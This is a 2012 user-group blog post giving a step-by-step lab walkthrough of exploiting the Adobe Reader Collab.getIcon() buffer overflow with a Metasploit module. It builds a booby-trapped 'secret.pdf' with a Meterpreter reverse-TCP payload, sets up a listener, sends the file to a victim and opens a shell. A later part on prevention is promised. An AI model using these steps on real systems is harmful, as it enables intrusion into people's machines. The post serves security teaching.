Mumbai Security and Compliance User Group

 View Only

Adobe Reader Buffer Overflow Exploitation and Prevention part-i 

Feb 01, 2012 01:39 PM

 

I am writing this article into 2 parts. In First part I will show you how to exploit fully patched Machine but unpatched Abobe Reader installed on it and In 2nd Part i will show you how to prevent this attack with Symantec critical system protection (SCSP).
 
Adobe Collab.getIcon() Buffer Overflow
 
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.
 
Exploitation of Adobe Collab.getIcon() Buffer Overflow Vulnerability
 
1) Our Victim is using windows xp professional SP3 and its IP Address is 192.168.42.23
  
    
 
2) Our Victim is using Fully patched Operating system.
 
    
 
3) Adobe Reader 8 is insalled on our victim machine.
 
4) I am using Backtrack 5 R1 as Attacker machine and its IP Address is 192.168.42.62
 
5) I am using windows/fileformat/adobe_geticon metasploit module to exploit Adobe Collab.getIcon() buffer overflow vulnerability (use exploit/windows/fileformat/adobe_geticon).
 
   
 
6) I have to set the filename (set filename secret.pdf)
 
    
 
7) I am using windows/meterpreter/reverse_tcp payload.
 
    
 
8) Now i have to enter LHOST (Local Host) i.e 192.168.42.62 (Attacker Machine IP Address). Write exploit and Hit Enter. It creates a file name secret.pdf
 
    
 
9) Now i have to set up a listner,To do this let use multi-handler exploit.I am using windows/meterpreter/reverse_tcp payload. set lhost(Attacker Machine IP address) and lport (Attacker Macine Port no), write exploit and hit enter, then listner is started on Attacker Machine.
 
    
 
10) Now i have to send this pdf file to my victim. when our victim tries to open this file our exploit will execute on his machine and give shell to the attacker machine.
 
     
 
11) I successfully got the meterpreter shell of my victim machine.
 
     
 
In Next Part I will show you how to prevent  Adobe Collab.getIcon() Buffer Overflow Vulnerability With Symantec Critical System Protection.

Statistics
0 Favorited
0 Views
0 Files
0 Shares
0 Downloads

Tags and Keywords

Comments

Apr 04, 2012 08:55 AM

@wxzcool:- Your welcome bro..

Apr 03, 2012 01:45 PM

ALL YOUR ARTICLES IS SO GREAT! THANKS YOU FOR SHARING

Related Entries and Links

No Related Resource entered.